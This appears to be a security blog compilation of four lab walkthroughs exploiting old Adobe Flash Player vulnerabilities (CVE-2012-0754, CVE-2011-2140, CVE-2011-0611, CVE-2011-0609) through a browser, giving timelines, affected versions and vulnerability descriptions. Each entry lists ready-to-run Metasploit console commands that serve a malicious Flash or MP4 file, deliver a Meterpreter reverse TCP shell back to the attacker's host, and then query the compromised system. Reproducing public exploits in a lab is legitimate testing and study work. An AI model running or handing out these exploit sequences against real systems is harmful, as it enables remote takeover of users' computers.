Timeline :

Vulnerability found by Alexander Gavrun from ZDI
Vulnerability reported to the vendor by ZDI the 2012-01-12
Coordinated public release of the vulnerability the 2012-02-15
Vulnerability found exploited in the wild by contagio the 2012-03-02
Metasploit PoC provided the 2012-03-07

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0754
OSVDB-79300
APSB12-03
ZDI-12-080
contagio

Affected version(s) :

Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 11.1.102.55
Internet Explorer 8

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “Iran’s Oil and Nuclear Situation.doc” e-mail attack.

Commands :

use exploit/windows/browser/adobe_flash_mp4_cprt
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI the 2011-02-10
Coordinated public release of the vulnerability the 2011-08-23
Vulnerability reported exploited in the wild in November 2011
First PoC provided by Abysssec the 2012-01-31
Metasploit PoC provided the 2012-02-10

PoC provided by :

Alexander Gavrun
Abysssec
sinn3r

Reference(s) :

CVE-2011-2140
OSVDB-74439
ZDI-11-276
APSB11-21

Affected version(s) :

Adobe Flash Player 10.3.181.36 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 10.3.181.34
Longtail SWF Player
Internet Explorer 7

Description :

This module exploits a vulnerability found in Adobe Flash Player’s Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn’t included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.

Commands :

use exploit/windows/browser/adobe_flash_sps
set SRVHOST 192.168.178.100
set SWF_PLAYER_URI http://192.168.178.100/mediaplayer/player.swf
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Timeline :

Vulnerability discovered exploited in the wild
First information about the 0day published the 2011-04-11
Security Advisory APSA11-02 posted by the vendor the 2011-04-11
First vulnerability analysis provided the 2011-04-11
Vendor update provided the 2011-04-15
Metasploit PoC provided by sinn3r the 2011-04-15

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2011-0611
APSA11-02
OSVDB-71686

Affected version(s) :

Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.25 and earlier for Chrome users
Adobe Flash Player 10.2.156.12 and earlier versions for Android
Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Adobe Flash Player 10.2.153.1

Description :

This module exploits a vulnerability in Adobe Flash Player that was discovered, and has been exploited actively in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results arbitrary code execution.

Commands :

use exploit/windows/browser/adobe_flashplayer_flash10o
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

Timeline :

Vulnerability discovered exploited in the wild
This vulnerability was used to attack RSA
First information about the 0day published the 2011-03-11
Security Advisory APSA11-01 posted by the vendor the 2011-03-14
First vulnerability analysis provided by villy the 2011-03-15
Metasploit PoC provided by bannedit the 2011-03-22

PoC provided by :

Unknown
bannedit

Reference(s) :

CVE-2011-0609
APSA11-01
OSVDB-71254

Affected version(s) :

Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.18 and earlier for Chrome users
Adobe Flash Player 10.1.106.16 and earlier versions for Android
Adobe Reader and Acrobat X (10.0.1)
Earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh

Tested on Windows XP SP3 with :

Internet Explorer 6.0.2900.5512
Adobe Flash Player 10.2.152.26

Description :

This module exploits a vulnerability in Adobe Flash Player. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory its fairly difficult to get around this restriction.

Commands :

use exploit/windows/browser/adobe_flashplayer_avm
set SRVHOST 192.168.178.21
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

Long time

sysinfo
getuid